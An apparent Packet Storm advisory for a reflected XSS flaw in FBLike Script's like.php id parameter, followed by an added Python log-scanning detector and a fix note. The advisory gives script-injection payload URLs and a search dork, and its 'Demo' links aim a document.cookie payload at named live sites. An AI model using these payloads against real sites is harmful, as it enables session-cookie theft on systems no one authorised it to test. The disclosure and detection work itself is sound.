FBLike Script Cross Site Scripting

2012-03-25T00:00:00
ID PACKETSTORM:111184
Type packetstorm
Reporter Crim3R
Modified 2012-03-25T00:00:00

Description

                                        
`# Exploit Title: FBLike Script Cross Site Scripting  
  
# Google Dork: Copyright © 2010 FBLike Script  
  
# Date: 25/03/2012 1:53 PM #EST  
  
# Author: Crim3R  
# software Link : http://zumset.com/product/fbilike_script_v100.html  
  
# Version: v1.00  
  
# Tested on: all  
  
# CVE : XSS  
========================================  
The XSS is in the id parameter of like.php:  
http://127.0.0.1/fbilike/like.php?id="><script>alert(XSS-By-Crim3R)</script>  
  
========================================  
Demo:  
http://www.talkgold.com/bans/like.php?id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
  
http://ilikenigeria.com/like.php?id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
  
  
thanks to : H3X - Einstein - thE_Knight - Naboodgar - C0NS74NTINE - Cruel -   
S.a.S - Net.Plus -  
Mehdi.H4ckCity - 2MzRp - Mikili - iC0der - farbodmahini - M.Prince - IrIst -  
==============Crim3R=====================  
All SST&HC Members  
`
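An added detection example, not part of the original advisory: it scans web-server access-log lines for requests to like.php whose id parameter, after URL decoding, contains HTML metacharacters like those in the payload above. The log lines are constructed samples, and the function names and the Common Log Format layout are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Common Log Format (documentation IPs, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Mar/2012:13:53:01 +0000] "GET /fbilike/like.php?id=42 HTTP/1.1" 200 512',
    '203.0.113.9 - - [25/Mar/2012:13:54:10 +0000] "GET /like.php?id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E HTTP/1.1" 200 640',
    '203.0.113.9 - - [25/Mar/2012:13:54:12 +0000] "GET /like.php?id=%2522%253E%253Cscript%253E HTTP/1.1" 200 600',
    '198.51.100.7 - - [25/Mar/2012:13:55:00 +0000] "GET /index.php?id=%3Cb%3E HTTP/1.1" 200 300',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
HTML_META = set('"\'<>')  # characters that can close an attribute or open a tag


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding, bounded so crafted input cannot loop for long."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_id(log_line):
    """Return the decoded id value if a like.php request carries HTML metacharacters."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.endswith("/like.php"):
        return None
    for raw in parse_qs(url.query, keep_blank_values=True).get("id", []):
        value = fully_decode(raw)  # parse_qs has already decoded one layer
        if HTML_META & set(value):
            return value
    return None


def scan(lines):
    """Return (client address, decoded id) for every flagged line."""
    flagged = ((line.split()[0], suspicious_id(line)) for line in lines)
    return [(client, value) for client, value in flagged if value is not None]
```

A hit only shows that the parameter was probed; the fix is to HTML-encode id wherever like.php writes it into the page.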